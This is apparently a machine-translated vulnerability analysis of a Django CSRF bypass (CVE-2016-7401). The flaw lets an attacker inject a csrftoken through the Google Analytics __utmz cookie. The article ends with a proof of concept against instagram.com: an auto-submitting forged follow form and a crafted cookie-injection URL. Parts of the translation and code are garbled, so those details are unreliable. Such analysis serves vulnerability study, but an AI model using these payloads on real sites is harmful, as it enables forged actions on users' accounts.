CVE-2 0 1 6-7 4 0 1-Django CSRF Defense bypass vulnerability analysis-vulnerability warning-the black bar safety net

2016-09-28T00:00:00
ID MYHACK58:62201679717
Type myhack58
Reporter 佚名
Modified 2016-09-28T00:00:00

Description

Django yesterday fixes this vulnerability: https://www.djangoproject.com/weblog/2016/sep/26/security-releases/ In fact, last year had similar issues, report it to Twitter https://hackerone.com/reports/14883 that vulnerability is composed of the following components. 0x01 by the Google Analytics result of the Cookie injection vulnerability Google Analytics will set the following Cookies to track users:

__utmz=123456.123456789.11.2. utmcsr=[HOST]|utmccn=(referral)|utmcmd=referral|utmcct=[PATH] For example:

__utmz=123456.123456789.11.2.utmcsr=blackfan.ru/utmccn=(referral)|utmcmd=referral|utmcct=/path/ That is, we can control the[PATH]position to control part of the Cookie, and[PATH]is the location and not be encoded and filtered. This is also a cause behind the vulnerability of the fuse. 0x02 Django resolve defects Different Web server the Cookie header has a different parsing mode. Usually the browser sends the Cookie is this:

Cookie: param1=value1; param2=value2; Many Web server also accepts a“comma”as the delimiter of the Cookie header:

Cookie: param1=value2, param2=value2

Cookie: param1=value2,param2=value2 Python + Django but because of the error of the regularization, the result can be used]as the delimiter:

Cookie: param1=value1]param2=value2 This problem is Python's native Cookie library issues, we can at the command line to test it: >>> import Cookies >>> C = Cookies. SimpleCookie() >>> C. load('__utmz=blah]csrftoken=x') >>> C Visible, when the c. load('__utmz=blah]csrftoken=x'), the cookie is incorrectly parsed as two, a Cookie[__utmz]=blah, a csrftoken=x. 0x03 different browsers handle the Cookie characteristics In addition to the Safari, all browsers support some of the special characters space, comma or\is set to the Cookie value. Chrome handle Cookie attributes are limited in number. For example 1 Set-Cookie: test=test; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=.google.com; domain=blah.blah.blah.google.com; 的 domain 将会 被 认为 是 .google.com 而 不是 blah.blah.blah.google.com the. 0x04 injected into the TOKEN to bypass the CSRF check Using the above 3 properties, we can attack with the following conditions of the website: Using Google Analytics Use will error parsing the Cookie to the server, such as Django) Using a Cookie-based CSRF Defense the way that the Cookie Token and form Token is compared to ensure that the form is not forged. Then: We will in a Cookie Token is set to an arbitrary string, and overwrite the original Token So this site can bypass the CSRF Defense. Another problem is,__utmz this Cookie duration is 6 months will not refresh, also can't write new. As a workaround, you can find an equally utilizes Google Analytics for the subdomain, and then borrow 0x03 to the method of covering off the Main Domain Cookie domain can be. Other browsers, you can wait until the__utmz refresh time to attack. 0x05 POC preparation With instagram. com, for example. 用 谷歌 的 匿名 模式 打开 instagram.com 登录 instagram.com Click on the link http://blackfan.ru/facebookbugbounty/nouysqaqfbskgobuqkknoitvyqmjgony_instagram.html and wait for a while You have become http://instagram.com/black2fan fans of the successful brush powder Link code as follows: action="http://instagram.com/web/friendships/1312928755/follow/?ref=emptyfeed" id="csrf" method="POST">

function xxx() { document. getElementById('csrf'). submit(); }

src="http://blackfan.ru/r/,]csrftoken=x,;domain=.instagram.com;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;? r=http://blog. instagram. com/"/> This fourth step is the actual implementation of the following process: 1. 用户 登录 instagram.com 攻击 者 让 用户 登录 了 它 以前 没有 登录 过 的 blog.instagram.com to:

http://blog.instagram.com/r/,]csrftoken=x,;domain=.instagram.com;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;path=/;? r=http://blog. instagram. com/ 2. Cookie 的 domain 被 复 盖 为 .instagram.com to:

_utmz=90378079.1401435337.1.1.utmcsr=blog.instagram.com/utmccn=(referral)|utmcmd=referral|utmcct=/r/,]csrftoken=x, 3. In this case, the server will use this Cookie parsing is csrftoken=x 4. Then submit the CSRF Token=x of the form can be. Reference document: https://docs.python.org/3/library/http.cookies.html http://hg.python.org/cpython/file/3.4/Lib/http/cookies.py#l432 http://tools.ietf.org/html/rfc2109 http://tools.ietf.org/html/rfc2068